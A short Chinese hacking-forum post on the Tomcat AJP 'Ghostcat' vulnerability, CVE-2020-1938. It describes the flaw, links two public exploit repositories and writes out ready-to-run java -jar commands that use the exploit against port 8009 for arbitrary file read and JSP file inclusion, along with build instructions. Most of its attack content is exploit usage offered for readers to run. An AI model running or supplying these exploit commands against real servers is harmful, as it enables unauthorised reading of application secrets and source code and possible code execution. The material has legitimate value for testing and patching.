查看: 15828|回复: 0

Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2020-2-21 10:31:48 | 显示全部楼层 |阅读模式
    本帖最后由 90_ 于 2020-2-21 10:52 编辑

        Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。


    CNVD-2020-10487
    CVE-2020-1938

    EXP-1

    https://github.com/0nise/CVE-2020-1938

    apache-tomcat-8.5.32.zip 测试tomcat

    任意文件读取
    [AppleScript] 纯文本查看 复制代码
    java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp


    文件包含
    [AppleScript] 纯文本查看 复制代码
    java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp


    打包方式:在目录tomcat/ajp-bug 执行 mvn clean compile assembly:assembly

    EXP-2

    https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

    20200220231832.png
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 02:25 , Processed in 0.032310 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部